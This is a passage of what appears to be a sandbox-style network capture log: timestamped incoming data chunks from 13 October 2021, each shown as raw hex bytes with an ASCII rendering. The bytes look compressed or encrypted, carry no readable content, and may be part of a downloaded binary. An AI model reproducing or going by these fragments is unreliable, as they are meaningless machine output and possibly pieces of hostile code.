70 46 66 Data Ascii: d]C]}+)ZT}ws=}{Qxs_}YP;'VQqL}*DrT#:o$m2kC+"83ZHQOi#\|P,E+19N<}\gS-%:'<O_1yZMu&H4hE%~Bgg:@;eJKz.pFf
2021-10-13 07:59:22 UTC	555	IN	Data Raw: 6a 15 59 18 b7 0d 92 45 22 cd 19 1d cf f1 f0 cc e5 ee 75 d3 4d bb cb f5 1c 9a 25 83 fa f6 d2 68 2c 27 a1 61 cc e9 bc 96 f6 b2 e9 fd cb 3e 0f 94 ee 5e 79 fd 8f a9 79 df 0a 5b 29 49 a8 cb d3 d1 c1 ea 8d 2a c0 b3 59 44 18 5f 10 26 9c 74 3d 5e 52 32 ee f2 4a f1 fe 17 86 39 d6 3f ec ac fe e2 a5 17 9f ae 73 78 d2 e9 7c 6b 00 17 a9 85 a9 10 62 12 07 e0 93 30 21 32 78 67 e7 09 fa be 21 0c 7f 05 37 b0 73 ab 84 e5 e6 53 10 8c 0b 54 07 81 4c 20 e8 4e d7 40 aa f0 1d a8 05 db 12 a5 e4 42 e8 ae 0e 58 61 30 50 e2 ea d9 01 62 1f 43 38 0d aa 54 11 8f ae c1 5a 34 3e 66 1b 9d ba 2f 34 12 eb b4 fa 76 36 7d be fd 9f 0f 4a 34 cd 2f 5d 9e 2e 33 ed 44 8c c9 7d d5 1b c9 19 b8 69 39 65 f8 2a d7 b7 0e 7f 1f 52 0f 47 8e 3b fc d2 0d c9 c2 51 3a 7f 2b 63 2f 18 ef af d2 75 a4 73 12 f5 Data Ascii: jYE"uM%h,'a>^yy[)IYD_&t=^R2J9?sx\|kb0!2xg!7sSTL N@BXa0PbC8TZ4>f/4v6}J4/].3D}i9eRG;Q:+c/us
2021-10-13 07:59:22 UTC	563	IN	Data Raw: 78 57 fb 2f 25 cf 7c cd 28 38 4a df 8f 9d d9 4d da 06 c6 2f 8c 5b b1 b4 6b 52 de 15 31 f9 af 4d 47 09 9a bf bc d5 21 36 a4 c2 79 1c 47 79 43 2b ab ca 2d b7 42 49 29 3c cc 68 ea 3a e1 92 ba 1c e0 3d 98 fe 79 5f 7d ed 84 ae d6 07 de c4 af 12 ad 2f d7 60 da 39 60 9a 32 95 71 d9 c7 3f c7 4b 4f 29 aa ad 5c c7 7d 38 eb 4c c9 eb fd 62 2b ef 78 bb 76 ee 29 6f ab 7d 59 4a ac e2 9c 36 4d e4 6f f6 41 4b c6 9f d8 ff 6a 05 82 01 08 2c c2 44 00 a7 40 8f 64 10 19 39 05 08 44 f5 a9 80 55 0f dc ee 09 a2 00 8a 3c b4 0f 9d b8 28 2e 7f 0e b9 09 fa b0 2d 49 9b 48 84 cd c4 1c 57 e0 00 46 05 ca ff 60 8d a1 43 1d 3e a3 ca ff 06 a9 92 88 94 71 50 b6 10 52 65 2e ec f9 a4 eb 46 28 8b 84 74 51 2c 77 6d de 68 a2 49 02 69 0d f7 8c 66 4f 8a 49 3d 96 f1 fd 21 6b 7f 83 9c 87 d8 e4 ae 91 Data Ascii: xW/%\|(8JM/[kR1MG!6yGyC+-BI)<h:=y_}/`9`2q?KO)\}8Lb+xv)o}YJ6MoAKj,D@d9DU<(.-IHWF`C>qPRe.F(tQ,wmhIifOI=!k
2021-10-13 07:59:22 UTC	570	IN	Data Raw: ff a3 cd 0d 9d 04 0e 28 1b 0a f8 2f 1c 20 42 ff 25 e0 0f 3c e6 12 9a 03 a8 0d b1 af f6 82 00 01 c7 82 dc e1 5f 4d 77 0b 14 81 e3 6d 62 e2 02 6c 0a c4 b3 3c 04 d7 90 80 2a 48 b9 08 07 78 b6 2f 6a 9c 0c 08 4f fa 6f 1b f1 0f 81 8e 70 f4 5a 87 c7 2e 34 58 e3 bf 16 05 a3 19 5a 09 7f 01 89 2c 61 c9 00 65 52 e8 2c 21 a9 35 fd 42 74 13 c0 04 48 6a 67 de 9a b6 be a9 6c 3f 26 84 ab 96 34 f7 f7 5d 2f d6 96 93 dc 4c 1f ea 94 39 79 99 b2 f1 0c a5 9e 7b 72 08 7f 0a 0e 2e f9 71 9e 2e f1 e4 45 ff 76 e2 97 a3 58 78 a5 f2 aa b6 34 2a 93 f7 0e 43 c7 78 0f 51 b6 23 48 f7 11 56 b9 74 d2 26 d4 a9 b5 37 4b 0a 68 6e 4d bd a7 e7 96 6d 9b f1 2c f7 a3 39 be f9 3b 14 8b 49 9d af 86 9b b0 27 3d f8 93 78 37 90 28 92 74 97 5c 97 b8 49 df 4c 55 8f 68 fa d9 db 21 29 3d e2 fc 88 ec a6 ab Data Ascii: (/ B%<_Mwmbl<Hx/jOopZ.4XZ,aeR,!5BtHjgl?&4]/L9y{r.q.EvXx4CxQ#HVt&7KhnMm,9;I'=x7(t\ILUh!)=
2021-10-13 07:59:22 UTC	578	IN	Data Raw: 8c 63 2d 1a 9d 91 39 20 83 5d 28 a2 f4 a3 22 fb 7c 1f 88 b9 a9 b0 fc b7 8b 6f a3 77 29 08 0e b6 fd 0b 1a 82 93 54 0e 9b 8b ca 00 d6 f4 04 e2 ae 71 f1 05 07 6b ee ef 37 e4 d2 db f3 c3 cf 54 ab db b7 f0 1d 3d b5 ff 92 ac cf 0a 4c d8 ce 5d f7 d6 4a 2d 6f a6 13 b6 32 df 93 c1 c8 82 86 9a 3a 84 d8 71 83 6b 5e 43 e8 47 ed 75 b9 71 57 b8 99 30 a9 9d 60 9f 0f 1c 19 c1 fa 77 c7 20 ad 00 41 c6 41 13 4b b0 5e e7 7e f2 43 09 10 c7 6a d2 ef 90 38 63 38 bf f4 fc e5 ee 6c 14 60 93 f1 71 15 12 5c 1b 12 2a 75 ef 06 c8 b9 8e 63 3b ba 74 0b 3b 89 68 9d 47 c2 e5 9b 03 d5 b9 26 24 75 5e 59 42 34 65 d7 e5 79 12 83 05 2a ce 86 df 75 55 8b ca 42 a3 5b cd 64 dd c8 ad b7 f2 43 8b 07 c8 19 5e 42 0c 23 a1 aa d1 6a fd 00 cb a1 04 7e 0d cc 06 2c 06 8a 55 d7 fa 35 08 11 7d fb 84 e9 38 Data Ascii: c-9 ]("\|ow)Tqk7T=L]J-o2:qk^CGuqW0`w AAK^~Cj8c8l`q\uc;t;hG&$u^YB4eyuUB[dC^B#j~,U5}8
2021-10-13 07:59:22 UTC	586	IN	Data Raw: 34 a1 d4 9c cd d7 a9 a2 2d 4c b6 7e 80 5b d8 b9 f0 69 a3 57 58 bc 4d 14 47 5c 1a 99 8e c7 4a f4 53 51 38 bb 33 2d a3 f1 10 4c cf 63 f3 8b f4 37 ba 6b b0 3f 68 a4 b9 a8 07 5f 7c b5 32 bf 84 a3 8e fa bc c9 51 67 7c cb fc b8 8a 1a a9 b6 ac b1 3a 45 ea ce 8d 68 22 49 45 f7 ec 71 d0 94 a8 c8 3a 8b f6 26 1c ac be 56 27 6c 85 49 c4 f4 e2 ed b7 a6 77 c9 74 06 17 37 15 c2 2b a0 0a e0 2f 8f 43 02 45 bc 25 86 d6 15 b6 a0 05 18 01 7e d0 ee 2e cc 3b 87 8f a5 a0 6c e7 57 e3 97 81 ac 40 66 b6 7d 51 af 53 b7 af d6 5d b0 38 2f e6 32 63 2d db 9c dc 7c 59 25 9f d6 43 f5 0c 73 ec 60 89 de 88 84 e4 24 ee 83 be cc 78 0e 58 ca 91 eb e4 d6 93 fd 2f 9e c0 d4 84 6c e9 a1 4b fa e5 db 74 e3 0b fa 64 e9 2e 85 4b 57 0f f4 4d 3d 7e 93 8d c9 e2 24 bd af 11 b2 cb 37 6c c3 9c 49 90 6b e7 Data Ascii: 4-L~[iWXMG\JSQ83-Lc7k?h_\|2Qg\|:Eh"IEq:&V'lIwt7+/CE%~.;lW@f}QS]8/2c-\|Y%Cs`$xX/lKtd.KWM=~$7lIk
2021-10-13 07:59:22 UTC	594	IN	Data Raw: b7 99 e5 22 f2 2e 99 26 6c ea 5e f8 83 25 3e 7a 09 ba 08 e4 b4 02 e7 37 81 fd 9a 58 24 75 cd c1 27 e0 14 4b a0 4e af f7 3c 0b 13 fa b2 99 df 11 80 8e 09 f8 d6 37 a2 33 d5 4e da bc f8 54 12 0f 6f 9a 7e ba ca 92 3d 16 3d 7d 2c 57 5c ef 20 f1 8d b6 94 0d eb 76 1e 1d 5f c1 4b 30 9b b8 3d 81 27 91 e8 57 94 e0 aa d8 91 3c 40 ea c4 3b ae 3e 77 31 51 54 3f 1e ed ce 09 b7 1f c7 6f 19 4b 78 fd 77 0d b5 d2 5b 4e 00 82 b5 35 5a 5a 11 76 5b 37 e9 fd 3a 17 1d 63 c4 bb 82 aa 61 a4 d3 4e 38 d0 76 61 8f 9d 5c 91 f7 b4 90 43 28 64 cb fb a7 0f fd 8c 1c d4 d9 87 b1 47 b0 90 60 e9 b8 d2 5b 15 20 b1 fc ff 9b 3a 49 df 3f 04 7a ff d9 4f 56 e8 e3 3d 2e 59 e4 6f ca 62 d2 82 67 48 8a f4 7b 7a 4a f1 5c 59 54 a3 45 1d f1 b1 e9 6f 77 e7 93 e4 b1 1c 59 4e e3 a4 29 d7 1f 98 f1 06 fe b9 Data Ascii: ".&l^%>z7X$u'KN<73NTo~==},W\ v_K0='W<@;>w1QT?oKxw[N5ZZv[7:caN8va\C(dG`[ :I?zOV=.YobgH{zJ\YTEowYN)
2021-10-13 07:59:22 UTC	602	IN	Data Raw: 9c c5 7b da 31 f9 70 8e 93 ed 9f 0e 9f c7 8e 5d 2d f9 b5 b8 c6 f0 ba 79 e6 48 26 cb 00 a2 ad 76 97 4b 4e cb 23 7e 40 c2 9a af 3a 4b 6c 69 09 a0 3d 59 be 17 ec 9e c3 af d3 76 fa 0a 9c ff 95 f3 d4 66 87 d7 ec 1b 3c 73 32 40 34 ae 34 1b 6f dc 78 c5 97 67 72 7b 6d 51 b9 69 1f d3 45 a6 3f 06 f4 17 bf 8f ac a2 e5 99 44 4d b4 5e 5b 39 52 86 e0 32 79 a9 2d 3b e4 30 5d 2f b8 65 fb 7c e3 b6 8a 19 24 2d 7c aa 3e cf ba 1b d6 7d b8 12 9e 81 bf 42 71 58 92 2a ab 6f cc 60 e1 ba 71 c1 42 a5 c3 0b 6f cb 92 e4 13 cc 12 78 6f 95 db 2c b0 dd 40 6e 8f 90 d0 8a ff 2f 36 a2 b4 36 30 29 d5 88 31 0a 5c 66 a9 ab f9 c4 d6 b0 46 79 dc b1 31 d3 62 f1 30 25 3a 4d 04 c6 d3 1f 16 34 15 86 7a 25 63 df 93 cc f5 4a b6 36 fb 62 62 45 fe 93 f4 e5 86 c9 c5 74 63 9a e9 4a 27 07 4f 7f e5 0b 81 Data Ascii: {1p]-yH&vKN#~@:Kli=Yvf<s2@44oxgr{mQiE?DM^[9R2y-;0]/e\|$-\|>}BqX*o`qBoxo,@n/660)1\fFy1b0%:M4z%cJ6bbEtcJ'O
2021-10-13 07:59:22 UTC	609	IN	Data Raw: 4e 1b c4 51 3d 3e 5b 9f 54 5d ea e4 46 c7 d5 92 8e 50 77 60 87 4e bf 61 54 6f ec 4b 29 27 6d 4e 3e 54 c6 e8 49 5b b3 d8 90 c3 bd 90 5a 2c fc 0f 5a 15 78 f3 90 2c aa a7 2c 2d 15 b4 ff cc b4 04 41 a3 83 37 50 8e 36 14 04 9b 9d 0d 50 37 60 ff a1 f5 10 28 26 af 7d 59 a7 3e f5 2c 9c 1a 37 03 41 92 60 94 ef 40 fb 1c 90 18 65 55 41 28 0c df dc fc 18 51 26 80 dc f6 05 fb bb 01 05 c9 60 bf e0 2b bb c1 0d f4 ea 03 6e 75 02 53 c1 0b ea 59 13 65 5a 0c 33 08 40 7b 83 5e 7d 00 04 8b 1d ff c7 99 a2 66 d1 5d d6 c5 54 8a f4 9a ae 7d 99 3e f8 96 6e bd 34 32 f1 63 12 cd 23 7c d6 32 48 39 c6 4c dc 3c 3c 4f f2 5e b3 81 bf 8f cd e6 12 f5 58 67 19 5d d2 e7 69 b3 f6 3e 20 e4 d3 6f f7 c0 4c 97 fb 0b d1 fb 6e 75 f9 43 1c ef 9c d3 fd a8 9d df 09 de dc b7 7a 2f 62 a2 76 b9 85 4e 6f Data Ascii: NQ=>[T]FPw`NaToK)'mN>TI[Z,Zx,,-A7P6P7`(&}Y>,7A`@eUA(Q&`+nuSYeZ3@{^}f]T}>n42c#\|2H9L<<O^Xg]i> oLnuCz/bvNo
2021-10-13 07:59:22 UTC	617	IN	Data Raw: e0 f0 69 b8 35 a5 61 3e 6d 1f 85 84 80 64 3c 13 c1 87 4f d0 4e 8a 8e a0 42 0c 26 a7 8a e0 c8 8f fe 83 37 73 a6 d0 43 cd 15 b3 e3 3d 84 95 c9 9a fd 9d 8e 41 ba 98 8f f9 64 cf 0b 0c 24 de 24 8b d8 bc 9f 2c 98 1f 61 ee f2 cc 3f 39 f1 13 f6 3d f4 c4 bf b7 e4 c3 e3 d0 19 1d 28 fd 53 35 48 fb 3c 86 5d 5c bd 68 f3 a1 88 13 ef 5e e6 42 a6 7b 6e 7c 34 b9 8e 77 06 13 9f ba 88 ac 60 93 ee fa b8 f1 93 a3 6e cc e8 f1 52 c8 2a f6 a6 fc aa 45 55 b0 77 a9 cf 1f 69 77 88 c5 d8 4a 84 9e fd 34 da 6f b1 73 a6 18 70 1c 60 c7 2e 47 8d 4b 50 c4 35 3a ce f7 b7 fd 5f 88 c1 69 5b 24 97 9f e6 71 f5 b6 a0 d1 52 ca 83 2d d9 53 28 ac 0a 54 aa 37 ec 8d af c3 15 28 35 fe 63 73 4e fb 49 ac 89 6d cf 10 b1 bb 1d 84 f2 13 e4 44 59 68 ab f5 54 e5 61 b4 54 0f e5 1a 46 66 8d 1e f3 88 a1 ad 4d Data Ascii: i5a>md<ONB&7sC=Ad$$,a?9=(S5H<]\h^B{n\|4w`nR*EUwiwJ4osp`.GKP5:_i[$qR-S(T7(5csNImDYhTaTFfM
2021-10-13 07:59:22 UTC	625	IN	Data Raw: 8d db a5 a8 5f 93 9b 33 0a 89 94 5a 50 64 0d 63 ff ed 0e c1 46 f5 35 09 48 90 9f 89 70 29 83 cb 20 a3 2b 41 45 77 35 7f bc 05 bd a5 42 d0 5e 6d b7 2d 75 56 ea d5 cc 72 98 e6 ef 22 21 0c c3 2d bf 1e a2 d7 dd 5f 25 6e fb bc cd bb a0 80 d1 ab ea 39 44 e6 af f1 47 fc b5 64 3c 25 1f ac bc 8c bf 25 94 dd fa 66 63 30 5c 7d e2 50 a0 6e cc 8f bc 72 97 aa 78 68 47 eb d2 7b 64 1e 6d f0 8a eb 77 17 e7 92 cb 65 6d 1a 59 92 87 c8 e4 39 87 9c 5e 61 1f ec c8 0e 12 ad c9 be 7e bd e3 6d 72 65 54 c7 8a 9f c2 c2 d9 17 b6 54 6e 22 8a 04 b0 77 ad af f6 9f f0 24 c7 f7 b7 bc d3 1b be e2 cf f7 38 4d 79 db 6e 59 25 ab 4f e1 95 bd f7 71 98 96 73 46 f4 e5 2d a7 3d b9 1f d6 17 62 29 ca 46 9c d7 b8 63 10 a0 ed 9c 6a 3e 42 7d dc dc 4e ea a9 0f 18 ce d2 11 7d ed 31 3c 9e 27 f8 8e b7 a3 Data Ascii: _3ZPdcF5Hp) +AEw5B^m-uVr"!-_%n9DGd<%%fc0\}PnrxhG{dmwemY9^a~mreTTn"w$8MynY%OqsF-=b)Fcj>B}N}1<'
2021-10-13 07:59:22 UTC	633	IN	Data Raw: fe 93 6c 46 23 e6 32 b5 94 58 98 45 58 f4 d3 6c 2e 4c 3a b3 8a b7 0c df 9e d2 c9 da ac a3 c3 b0 b5 e3 2c 35 99 71 2e 26 a2 02 d0 e6 a2 86 7f 7f e1 19 63 e5 43 f5 13 de aa eb 7d 19 d3 2c 06 fc 98 0d 83 79 ee 91 ba 92 68 66 24 13 f7 54 bd 97 0f 5c 48 ff 9c dc 8f 07 b2 94 45 50 e8 35 d8 6e 89 28 b8 c2 3f cc 16 20 55 fb fa c7 d1 ba 5d ae 0f c3 1d 22 b0 04 6d c7 42 55 6f 2f 22 49 fc d7 03 10 16 b4 1a e5 77 4a 90 d2 d7 59 d4 4d bf 3b 10 b1 57 1d 0a 59 a4 ae 26 0b 50 dd c1 af 5e 22 b5 23 89 bd a1 02 4d c9 19 f7 28 52 47 49 1d 41 36 cc be a3 a9 59 e8 b6 69 2e fd 7a 06 ed 7a a7 aa 92 a6 43 b5 b9 83 79 3e 97 2c af 46 62 5f 6e 6b e2 e8 4e a6 b8 fb 7c 33 e8 53 96 14 2b e7 3e 91 a5 26 05 b4 88 5b 41 45 ce 1f 8f 77 26 85 12 83 5e e1 f9 35 77 6c 8a 6a 19 aa e9 03 ac ec Data Ascii: lF#2XEXl.L:,5q.&cC},yhf$T\HEP5n(? U]"mBUo/"IwJYM;WY&P^"#M(RGIA6Yi.zzCy>,Fb_nkN\|3S+>&[AEw&^5wlj
2021-10-13 07:59:22 UTC	641	IN	Data Raw: 4f 3c 92 1e 3e 4b 07 4f 1f 80 4f b0 31 09 34 ff 9f ed 58 32 3e f4 46 f5 7c 6f 97 bd b9 c2 85 1c 51 f4 e0 fc 2a 15 18 44 76 56 53 eb b5 1e 3b 30 9a 37 0a 1d fe d9 11 9f 71 6f 9a b1 d9 9b e3 4b 72 69 56 7b 8a 86 89 f0 ad b6 86 21 7a c3 86 a1 8f 9c 89 92 b0 c4 65 62 b9 a8 b1 6e e5 f3 40 a5 bf f8 d6 f0 be c7 5d b3 88 d2 97 7d fe bd a9 f3 f2 dd 55 4f 67 25 82 b1 26 1b 41 8a 17 b4 7a 9a 4d 24 2e 52 61 ed 49 42 1c 52 13 a7 e3 a9 b6 9d 7f 11 eb 56 3b 33 bd d8 be a9 1e 31 aa 44 d5 92 07 71 51 54 e4 9e 8d 9e 30 7f 73 bb da 57 b1 b3 ca 8a 56 f6 f6 6e 0c 9d 8c ae b9 ae 81 6b 98 bf 03 2a 81 15 31 e8 28 a2 e0 23 7f 82 1c de 92 c0 93 2a c0 55 14 79 a8 08 7d a6 84 d4 ba 17 3d 88 6a fc 03 9c 0b ff 3d 74 45 4b fa 1e 6c ba bd 4b a9 fb 92 26 0f 66 51 3b 81 91 07 3b a2 4e 92 Data Ascii: O<>KOO14X2>F\|oQDvVS;07qoKriV{!zebn@]}UOg%&AzM$.RaIBRV;31DqQT0sWVnk1(#*Uy}=j=tEKlK&fQ;;N
2021-10-13 07:59:22 UTC	648	IN	Data Raw: 32 bf fa e1 df 30 86 2c 63 b8 63 04 84 81 e0 86 dc 61 0e 79 4e 1f df 04 03 97 92 c3 6b 7c 4f 0e ca 04 f0 74 a4 bd fe e0 b5 10 6e 10 42 80 f5 a6 b8 6d 6f 84 26 dd 56 48 29 b4 8b 22 9f 2d 6e 82 66 a9 3b ef 04 7f ef 58 64 9c d3 07 1c 4b ad 95 f3 14 ae 65 6c bc eb dd f9 77 9f 72 3a fd f3 3b 37 03 fd b9 59 36 2b b8 28 de c6 e1 c4 22 26 be bf 93 18 f8 8d 26 13 b6 5d d1 c1 4d 2d 92 8d 09 da 5a 9d ba 1a 33 d0 d0 93 98 e4 ee cc 5f 25 74 bc 3b 9b 82 83 72 83 09 10 21 b8 47 ff 68 06 f1 4b 7d 29 55 ba 80 c9 10 92 ea 49 e9 d3 b0 5b bb 95 c0 69 ca d7 49 a9 60 f4 73 63 b7 96 f2 9c 2c 19 24 d5 72 72 cc e9 13 97 09 9f 15 84 84 4d 5a 8e 56 b3 61 b8 e6 ad 08 b4 ec ec 15 09 ab e1 ee 24 87 95 3f 6f 29 95 44 8f 63 6c cd 31 79 73 2d 4b 45 96 44 c8 8e b9 62 f9 49 c8 f9 e1 f2 3d Data Ascii: 20,ccayNk\|OtnBmo&VH)"-nf;XdKelwr:;7Y6+("&&]M-Z3_%t;r!GhK})UI[iI`sc,$rrMZVa$?o)Dcl1ys-KEDbI=
2021-10-13 07:59:22 UTC	656	IN	Data Raw: 7f 53 e2 78 fd 1f 15 9f 34 9d e6 fc 3b e9 f9 7b e6 a3 ae 13 43 5f df 4f e8 80 5c e5 7b 41 4f 29 35 e9 dd a3 15 de 59 16 eb f5 ae 10 30 3c 87 70 52 52 0d 03 fb d4 44 ea 66 34 8d ae 19 77 99 3c c9 3e bd f9 6a 75 cd d6 06 86 b8 f9 0c 73 da a4 06 62 cc 1d ad 07 8e 8a b1 57 92 94 7b 39 99 44 11 cf 06 7c 11 b4 f1 6b 53 0d 1b cc f6 e5 89 3e bb 87 8b 00 92 11 73 35 9a ae 3f 2f 24 66 0e 85 eb 60 a2 b2 60 af d8 48 8a ff 9b 12 88 38 14 fe 0e 84 d5 6a 19 fe e5 76 7e 67 4f 01 02 ff 68 be 46 1c c2 9d a6 f8 9b 68 26 48 ca 01 33 5b 06 13 ee 6c 0f 07 44 06 02 44 af ff 41 70 60 8b 82 d1 f4 06 1a 03 16 06 d0 2d 46 84 02 c9 7f d9 50 1a fe 09 04 73 f0 0b 9c 7c 0e 17 2c 89 21 e7 9b ee b6 32 66 7f 41 83 fc e4 d3 7a 53 d1 0f 57 0c 9a 1f 79 27 a6 3b ee 52 63 9f 79 e5 61 4a 71 c4 Data Ascii: Sx4;{C_O\{AO)5Y0<pRRDf4w<>jusbW{9D\|kS>s5?/$f``H8jv~gOhFh&H3[lDDAp`-FPs\|,!2fAzSWy';RcyaJq
2021-10-13 07:59:22 UTC	664	IN	Data Raw: ad fb c6 19 64 75 e8 92 92 46 b5 11 a3 e6 65 47 72 aa 73 19 af 8f f4 7b ee 5e f8 a3 0e 48 ed fd 91 ee 6e a4 7b 24 72 6b 87 a5 3b 13 06 a4 5a fd 9a 6c 6b 59 d2 9f 82 f4 90 de 96 76 b4 f6 0e 96 b4 4d ad a4 63 b9 ee 26 b1 a4 ec 6c 85 8a 65 d7 b5 b5 8e 52 dd bf de e0 3e 95 0d e8 e7 2a 64 6c ec 76 cf 78 56 bf 08 61 36 96 2d 59 68 3b fe fa 3d f8 3d 67 d6 13 1f d2 47 9f 59 b4 c4 88 bd b9 c1 df 2b 10 65 a3 b3 45 bb 07 cd 71 b9 c6 85 a0 9b 90 33 40 4f fa b5 58 af 30 6e b4 ef 53 61 a9 f7 87 ee bb 4b 35 c2 dd b5 b8 56 d5 46 98 3f 62 66 fe 0d 2f df 06 77 ef 1f 98 73 ba b8 95 a2 9c b9 3c b4 97 0f 10 b4 75 f1 8a 65 c0 cf 7d 45 a8 a5 ca e8 2b b6 14 e7 29 9a 37 e2 f0 63 7b 32 e4 1a d4 2a d4 9e bc 48 f0 2c c4 a9 ab fe 9a dd 5d 97 7a 43 a9 88 65 2f ea 8e f8 b9 73 0a 61 5d Data Ascii: duFeGrs{^Hn{$rk;ZlkYvMc&leR>dlvxVa6-Yh;==gGY+eEq3@OX0nSaK5VF?bf/ws<ue}E+)7c{2H,]zCe/sa]
2021-10-13 07:59:22 UTC	672	IN	Data Raw: eb 55 7e 6a bf fe aa f8 ef 9e 05 83 92 1b 60 7f bb 9e 42 88 50 5c 49 76 6d 95 57 90 dd 9e b5 a8 b0 e2 59 49 72 2d 97 b0 51 10 b6 eb 26 88 8c d2 94 ba e2 a8 31 67 b2 85 f8 a5 c3 43 db f3 e3 e1 5b b7 28 f2 cf 77 b9 a2 a7 fe bf 98 57 6d 88 c7 17 77 d7 44 6f 2c 35 9b 65 ac df 52 19 44 f1 ca e1 0d 42 8b d0 f1 7e 15 4f 6c d4 4a 7d cd 25 11 42 bc cf 6b 55 9a 85 d8 d5 da 5c 7a d8 87 b0 3d 5f 51 fc f5 fc b2 dd 2a 45 91 73 8f da a9 ba 8d 12 2b f6 2e 1e 75 2f 0f 7b eb 56 36 9e b7 23 f9 24 67 3c 1b eb 78 07 3d 76 63 e4 fd fb 3f bd c1 43 bd eb 64 2f 83 c9 44 ea 92 66 47 65 17 17 cb ac ed c0 e4 1f 58 02 ee 12 e0 54 c2 11 d8 72 ae b1 2c e7 92 87 05 d5 70 6b 15 4c 53 78 48 06 79 e6 ea a1 74 91 2f e5 ac ab 98 c8 1a 22 3f a5 2f 8f 35 bf 99 38 de 5b 28 b5 f1 8d d3 46 a8 77 Data Ascii: U~j`BP\IvmWYIr-Q&1gC[(wWmwDo,5eRDB~OlJ}%BkU\z=_Q*Es+.u/{V6#$g<x=vc?Cd/DfGeXTr,pkLSxHyt/"?/58[(Fw
2021-10-13 07:59:22 UTC	680	IN	Data Raw: 58 ad 53 09 bf 1d 4c ed 66 4a 25 91 bc e6 04 9b 53 6b 72 64 cd 45 db ad c7 43 e5 c7 70 7d 4f 54 9d ed ab 42 ce b6 99 1b b5 f8 bd 89 88 55 c8 b7 48 c8 a5 db f6 57 46 5a 06 40 47 cf f5 fe 4f 40 3e 59 73 f7 84 a4 96 83 9c b3 09 71 4f 21 04 d0 90 18 52 3c e2 12 c7 36 00 70 d6 be 15 46 7a 09 8f b8 44 68 1c d7 ff e8 86 4c 67 88 33 58 bb b3 5b fd 32 a2 e1 9e 37 92 0c f7 79 fb ac 58 05 49 22 34 6d a8 5f 7a e5 27 a6 53 b9 bf f8 29 fa d1 41 c4 4e 27 e4 18 ab a7 8a cb 6f c0 c6 65 e8 d5 52 2e 95 31 15 40 5c ab a1 c0 b4 b9 e8 a7 0a e7 a7 24 b6 14 bd f8 33 af 7f 88 ff 03 61 65 46 55 1d d6 5f 91 74 d6 8b ed a4 a0 de f1 76 c0 8e 47 3c 29 b6 ac 9d 0e fa 60 5b 58 4e 37 09 d4 4e 93 ee 38 e0 3e 37 a1 5b 43 bd a6 f3 9c db 7c 71 72 fb 59 af 91 d5 44 11 f5 70 f6 45 b1 c3 5b 72 Data Ascii: XSLfJ%SkrdECp}OTBUHWFZ@GO@>YsqO!R<6pFzDhLg3X[27yXI"4m_z'S)AN'oeR.1@\$3aeFU_tvG<)`[XN7N8>7[C\|qrYDpE[r
2021-10-13 07:59:22 UTC	688	IN	Data Raw: 08 4d cb 06 16 ca 44 4a 48 c4 c4 cf 01 56 21 82 db aa 04 11 19 54 06 a0 7f ed d9 e6 db a5 6a 4d 9a 7c 53 b1 8a 85 f0 39 25 36 44 91 31 dd ce 11 d1 2b 72 29 47 e9 66 d7 28 4a 29 a2 f8 bc fb d8 e7 27 c8 3e 3c 0c e7 8e df 75 b1 2e 70 90 d5 5e bc bd 32 77 6a c8 84 7e e8 d1 20 ce 39 a1 00 55 bb fa 2e ef 37 61 7c 05 6a 36 df 9c fb 4a 67 76 be c7 de e9 05 ee be 7b 37 e1 01 1a d2 df c3 c0 5b 86 51 0c 75 7b 52 f9 d1 d9 36 ec 1c d2 f3 19 dc 13 79 74 e6 fd e5 57 5d 0a 3e 3f 33 51 94 3f 33 c4 97 a4 be 07 9b 7c 52 e6 1e e4 5f 82 ea 19 29 e6 9f 0d 94 3e 79 04 b7 30 81 09 c2 2d 74 06 e7 02 f4 c1 43 0e 1d 8d 00 0e 15 83 4f 09 30 1c f7 3e 87 34 b6 0f 47 a1 9b 52 21 b9 4b 60 4c ad 0e c3 a3 36 90 40 9b d3 d0 08 6a 99 fe 84 01 77 2a 04 31 25 fc 25 54 42 19 48 3e 04 3f 41 60 Data Ascii: MDJHV!TjM\|S9%6D1+r)Gf(J)'><u.p^2wj~ 9U.7a\|j6Jgv{7[Qu{R6ytW]>?3Q?3\|R_)>y0-tCO0>4GR!K`L6@jw*1%%TBH>?A`
2021-10-13 07:59:22 UTC	695	IN	Data Raw: 98 c2 b3 1a a0 31 41 6b 0b 15 53 63 b6 47 84 86 ed 25 20 67 84 8e 5f dc 92 a1 a6 28 10 c5 1d b2 39 81 35 a2 46 cd 35 76 4c 6d 8f e1 6e 8a 25 de b9 2f d3 a9 d2 3d 14 16 38 a6 3b 3f b2 d1 96 0d 66 32 6e 39 b8 a9 22 88 da cf 97 c9 2b 9a d7 37 21 45 0b f0 b4 51 da ee 72 02 a5 26 21 86 92 ff cf 47 21 38 7a 6e a2 ee db 24 4f 3b 1a cf 4c c5 27 8b dc 78 4e a3 ad 61 d1 fd 1f 7b 8e 9d d1 bb 8e 22 87 51 d4 7a 1f 6f 81 c2 f2 95 1d 36 5b 57 b5 cd f9 35 8f 53 bc fb aa de 6f 5f aa d0 7b 3a fd 65 4b 6b 41 f3 bd fe 07 51 c6 f2 5a 9d 4e 5f 9b e0 6e 58 bf 1a 6b 05 a6 f7 be 3d af 6b 74 da d3 a9 17 0b 9f 63 b4 b7 6f fd 2e c6 99 f7 f7 35 cb 1d b7 af f8 f8 7d 97 33 74 9c e9 fa 4e 57 77 b3 c5 74 5e fe 93 49 56 ae d4 67 5a 1f bb 93 f5 b7 9c 47 b1 3e b2 d0 f8 8c ff 8f e0 d1 73 3a Data Ascii: 1AkScG% g_(95F5vLmn%/=8;?f2n9"+7!EQr&!G!8zn$O;L'xNa{"Qzo6[W5So_{:eKkAQZN_nXk=ktco.5}3tNWwt^IVgZG>s:
2021-10-13 07:59:22 UTC	703	IN	Data Raw: 91 b0 00 00 00 3f f3 de 5c 90 34 58 be af 31 2f f4 e4 61 0d 76 a5 fe 9c 8c 00 00 80 00 02 13 bd 2f f4 e4 60 00 3f e5 97 52 b6 4d f8 e8 82 2a cb fd 39 16 00 00 10 c5 a6 5f e9 c8 b0 00 08 00 07 f8 63 6a 56 ca bf 8f a7 d1 f3 2f f4 e4 78 10 b7 dc bf d3 91 e0 10 00 00 00 42 77 a5 fe 9c 8f 08 04 04 b4 1d 4a d9 74 bf cd a2 0a 80 00 00 08 7b 5e 5f e9 c8 c0 00 00 08 78 23 fc 7e d3 bc 66 b9 1d ce 62 84 25 72 0f c3 da 6a 14 ad c8 c1 58 ae 7e 48 ee 54 6d 53 16 f5 d2 6b c9 24 65 fe 77 2a 36 40 10 cd 72 5f e9 ca 74 00 00 00 08 4e fc bf d3 94 e8 7f 77 36 d1 05 ee fe b0 e5 41 57 82 b3 21 c9 22 5f e6 d1 05 